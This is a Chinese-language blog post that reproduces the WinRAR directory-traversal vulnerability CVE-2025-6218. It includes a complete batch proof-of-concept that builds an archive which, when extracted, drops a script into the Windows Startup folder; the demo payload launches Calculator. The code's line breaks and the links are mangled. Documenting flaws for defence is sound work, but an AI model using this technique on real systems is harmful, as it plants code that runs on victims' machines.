17370845950

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞

0x00 前言

WinRAR 是一款功能全面的压缩文件管理工具,作为 RAR 压缩算法在 Windows 系统下的图形化版本,广泛应用于各类文件处理场景。

它不仅可以用于数据备份、减小电子邮件附件体积,还能解压从网络下载的 RAR、ZIP 等多种格式文件,同时支持创建新的 RAR 和 ZIP 格式压缩包。

自 5.60 版本起,WinRAR 更换了全新的图标设计,但官方仍提供主题包供用户选择,可手动恢复为经典界面风格。

0x01 漏洞概述

该漏洞源于 WinRAR 在处理压缩包内文件路径时存在逻辑缺陷,攻击者可通过构造特殊路径实现目录遍历,导致文件被释放到非预期目录,从而在当前用户权限下执行恶意代码。

0x02 CVE 编号

CVE-2025-6218

0x03 影响范围

WinRAR 版本 ≤ 7.11

0x04 漏洞验证过程

1、安装 WinRAR 软件(版本需 ≤ 7.11)

图片2、利用公开的 POC 工具生成恶意压缩包

POC 地址:

https://www./link/e52917b6014799a313777d99a977c518

批处理脚本内容如下:

@echo offtitle CVE-2025-6218 POCecho calc.exe > POC.bat"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"  CVE-2025-6218.zip POC.batecho.if errorlevel 1 (    echo [!] Failed to create POC.) else (    echo [+] CVE-2025-6218.zip created successfully!)echo.del POC.batpause

注意事项:

路径中的" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"需根据实际批处理文件所在目录调整上级目录数量

图片3、通过右键菜单将恶意压缩包解压至指定文件夹,触发路径跳转行为

图片4、查看目标启动目录,确认恶意脚本已成功写入

图片5、重启系统后,可观察到恶意批处理文件自动执行,弹出计算器

图片0x05 参考资料

https://www./link/b89bd6465f1baed1810a82e1d5138f52

Ps:欢迎关注并分享国内外信息安全动态,转载请保持内容完整。如发现文章中存在敏感或侵权信息,请及时联系作者进行删除。网络安全道路漫长,感谢您的理解与支持!

本文及相关工具仅供学习交流使用,任何因传播或利用文中信息而导致的直接或间接后果,均由使用者自行承担,作者及本平台不承担任何法律责任。